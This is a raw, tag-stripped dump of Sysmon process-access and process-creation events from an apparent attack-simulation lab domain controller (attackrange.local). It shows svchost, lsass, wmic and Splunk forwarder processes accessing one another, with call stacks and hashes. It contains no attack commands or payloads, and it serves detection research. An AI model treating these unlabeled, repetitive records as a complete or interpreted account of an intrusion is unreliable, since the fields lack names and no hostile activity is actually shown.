09:20:18.959{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053675Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.959{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053674Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.959{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053673Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.959{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053672Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.959{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053671Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.959{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053670Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.959{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053669Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.959{5EBD8912-8CBD-6151-0500-00000000FD01}416432C:\Windows\system32\csrss.exe{5EBD8912-8CD2-6151-4A00-00000000FD01}4012C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053668Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.958{5EBD8912-8CD2-6151-4500-00000000FD01}38083812C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{5EBD8912-8CD2-6151-4A00-00000000FD01}4012C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+64ab|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1807c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053667Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.959{5EBD8912-8CD2-6151-4A00-00000000FD01}4012C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" check-licenseC:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{5EBD8912-8CD2-6151-4500-00000000FD01}3808C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000001053666Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.943{5EBD8912-8CBD-6151-0500-00000000FD01}416500C:\Windows\system32\csrss.exe{5EBD8912-8CD2-6151-4900-00000000FD01}3976C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053665Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.942{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD2-6151-4900-00000000FD01}3976C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+366e9|c:\windows\system32\rpcss.dll+3bed2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053664Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.928{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053663Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.928{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053662Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.927{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a16d|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053661Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.927{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053660Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.927{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053659Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.923{5EBD8912-8CD2-6151-4600-00000000FD01}38283832C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053658Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.787{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8CD2-6151-4800-00000000FD01}3940C:\Windows\System32\Wbem\wmic.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053657Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.787{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8CD2-6151-4800-00000000FD01}3940C:\Windows\System32\Wbem\wmic.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053656Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.787{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053655Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.787{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053654Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.787{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053653Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.786{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053652Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.786{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053651Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 